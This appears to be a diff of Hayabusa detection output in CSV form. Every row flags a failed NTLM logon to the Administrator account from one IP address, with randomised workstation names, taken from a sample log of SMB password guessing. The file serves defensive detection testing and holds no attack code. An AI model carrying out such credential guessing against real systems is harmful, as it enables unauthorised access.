+2016-09-20 01:52:42.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6q00SeueJQAiBGpe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QWzSR1cJ2XJNirSW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 39MY5ZvRJSHVkZZV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WyOdltctwdHNkH6i  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:42.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OUcWk0xJn9zVMZSF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: f2sauqNlJi3y0ZBk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bkih5QcLlcjw9gjg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3KlUJslcpS9jhLY4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: riuVWV1Ugr9c22hR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5OSj1I0sXkPf96OL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KsOJDxDiZSjoBj6F  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uH0bQ9zEi1xcfHn3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3AfNT0p4JC1VEfDd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: S7T8R8U1WVHZQrYk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kamexpa7isWT8gLC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8CyHFKVcdTo0Upx3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: U30aMcZuBD08GWK1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4mihftSCNCYdlBny  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.553 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: K2wa0xwK6tnurGJQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0V3TbNrKEnrDcEYt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: T73JW9JURm8Br6MA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OAleyg3h8aMvVVJk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1LQllnWZFUIWa6rw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hlwPxSGUmvYH0rpL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VrI56o5TyeO48rQV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CKRMn75tv5Yi5rYK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MbJvec7rVisJ6WCC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xoubp5WTPqblBaps  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:43.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rBczkR92cKY41icQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MfUx3OizEb1LiOzj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SRaSOLOWhBEr0qkz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YnlI8Zh4td5m1fpx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wXUDXDa4wi3HivKo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TT7iOtVMFcEysCcI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1NJpI7KC3gj99aWs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: H39cv9JEuLEjlp93  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4p9h1cjLeUzppSZb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: E0fOpi4vr55QmO6x  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GiKI4V6kpkY5zc9x  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dLmu4n9qZdf3Q5zo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 87iJdX2E0ZJintvr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nxc4iIHP0kdqQNiG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RJIWekwBwcIUWjD1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GdnvboiIDzXTZ8MR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QGMPHNpljTlMYeet  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pWo4uVFtAbe4IjKC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YAPdDqbMY4rYiuZ3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ai2WCQ3MkWwSeOy9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.946 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ey1wbsD7w3fs02xP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:44.983 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sVGzidwZICNfLizg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8zjGPMJ6RBw48Ejx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MydK8AjPvyyckCEL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4fqkCliAQMiFffQU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ITkku4kN4csBFyUB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: f5g9kMkSFhKrT2Py  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1xKLdwujTmLEc9ts  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sAW1YzCQ3CreseaP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vhqBirEHOKPepR3n  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5uqSFXpzAWOnc90n  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: McbeS9lRpbMc48jO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.477 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I6J0d7dQUmJNKJlu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QG3WU91rhTP9odx7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.579 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hSQRgB8yMfhb03g1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.614 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bzbZjRXTc0XvV4Ry  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: k3ShOCSaLGX4YBWE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lIrydzi8nmY251Z1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: h4vlRksTGxAqEt9j  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uJMnD0foEDbcNfTj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.829 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HNWppBJLFojEFtiF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: t7a9Tvr6ruDpiG2T  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NBNIizCKz2ybc3eM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:45.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YwuXQhISpgfSFqZ9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
